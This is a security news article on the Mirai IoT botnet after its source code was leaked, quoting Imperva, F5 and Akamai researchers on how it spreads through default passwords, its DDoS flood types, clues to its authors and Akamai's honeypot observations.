Now that its source code has been released you can expect more attacks from Mirai, the malware behind the largest DDoS attack on record, which was powered by hijacked IoT devices.
Since release of that code last week it has been responsible for smaller attacks that look like newcomers experimenting with the malware in preparation for bigger things, say security researchers at Imperva. “Likely, these are signs of things to come and we expect to deal with Mirai-powered attacks in the near future,” they say in their blog post.
That concern is echoed by researchers at F5, who say, “we can definitely expect the IoT DDoSing trend to rise massively in the global threat landscape.”
The historic attacks over the past two weeks that took down the popular KrebsOnSecurity site and challenged the resources of French hosting provider OVH mark the latest spikes in DDoS volume, which means mitigation infrastructure has to be prepared for attacks that are three to five times as large, according to Josh Shaul, vice president of web security for Akamai.
He says that despite the power of the attacks – up to 1Tbps – there’s nothing special about Mirai, which is named for the anime character Mirai Suenaga. “Usually the cool stuff is the exploits or the ability of the malware to hide or be persistent. Mirai can persist through a reboot of the infected device, but it’s not super sophisticated.”
It gets on systems by being installed after attackers login with default passwords. Mirai connects to an IRC-type service where it waits for commands. It doesn’t try to hide from forensic analysis, probably because the type of device it’s on won’t have an owner who is skilled enough to look for it. “It’s no Stuxnet,” he says.
The malware finds vulnerable machines by scanning a broad range of IP addresses until it finds IoT devices with easily guessable passwords, Imperva says. It’s got a number of DDoS attack methods in its playbook, including GRE, SYN, ACK, DNS, UDP and Simple Text Oriented Message Protocol (STOMP) floods.
The DNS attacks include the uncommon DNS Water Torture attack which overloads DNS servers used to resolve queries about the actual target, F5 says. When one server gets overloaded, the queries are retransmitted to another DNS server of the target and so on until legitimate traffic can’t be directed to the target.
Akamai’s Shaul says attackers are using smaller packets in their attacks, which stresses the networking equipment near the targeted servers as well as the servers themselves. Routers have to spend processing power for each packet regardless of length, so boosting the sheer number of packets can cause network bottlenecks.
He says Akamai has observed this effect. “With less traffic but more packets, you can break the network gear in the middle,” he says. “We saw both sides of that equation in those attacks last week.”
Who’s behind it?
“One of the most interesting things revealed by the code was a hardcoded list of IPs Mirai bots are programmed to avoid when performing their IP scans,” Imperva says. Those include the U.S. Department of Defense, the U.S. Post Office, HP, GE and the Internet Assigned Numbers Authority.
That leads the Imperva researchers to speculate that the creators of the malware are naïvely trying to avoid attention by eliminating those IP ranges, then following up by using it to launch one of the most scrutinized attacks ever. “Together these paint a picture of a skilled, yet not particularly experienced, coder who might be a bit over his head,” they write, but not a veteran cyber criminal.
The code uses English for its command and control interface but also contains strings in Russian. “This opens the door for speculation about the code’s origin, serving as a clue that Mirai was developed by Russian hackers or—at least—a group of hackers, some of whom were of Russian origin,” they write.
Whoever is behind Mirai might have launched the big attacks as a demonstration of its capabilities so the threat of a similar attack could be used to extort cash from potential victims in order to avoid the DDoS attack, Shaul says.
Those who download the software might be someone who has assembled a general-purpose botnet and wants to weaponized it as a DDoS army that could be used, say, in a DDoS-for-hire business. “I’d be surprised if we don’t see that happen,” he says. “The person who’s got the skills to do botfarming may not have the skills to do DDoS.”
Individuals probably won’t download Mirai to carry out a spiteful DDoS attack because it’s much more efficient to hire a service, he says.
Recruiting IoT botnets has a lot of advantages over trying to compromise PCs and servers, experts say:
- Many IoT devices have publicly exposed administrative ports protected only by default passwords.
- The devices lack security software such as anti-virus.
- Residential customers and small businesses that lack security sophistication are in charge of protecting the devices.
- Typically IoT gear is connected to the internet all the time.
- Attackers don’t have to deal with social engineering, email poisoning or expensive zero day attacks.
Akamai came across what came to be known as Mirai via a honeypot it set last summer that drew attempts to log into the box. Most of the attempts came from China, he says, and most were trying to log in to root. Many of the passwords being tried to log in to the honey pot were unique default passwords for IoT devices – closed circuit cameras and DVRs.
Sometimes on login prompts the attacks would use shell commands, indicating that the malware had a bug that made it blind to the fact that its login attempt had failed so it ran commands as if it had logged in successfully. The commands were attempts to download the Mirai malware.
That gave Akamai researchers something to compare actual attack traffic to.
Akamai tracked down some of the hosts in the botnet and found they were closed-circuit cameras and DVR systems. So the packets being sent were similar to what Mirai sends and the types of devices in the attacks were the types Miria preys upon.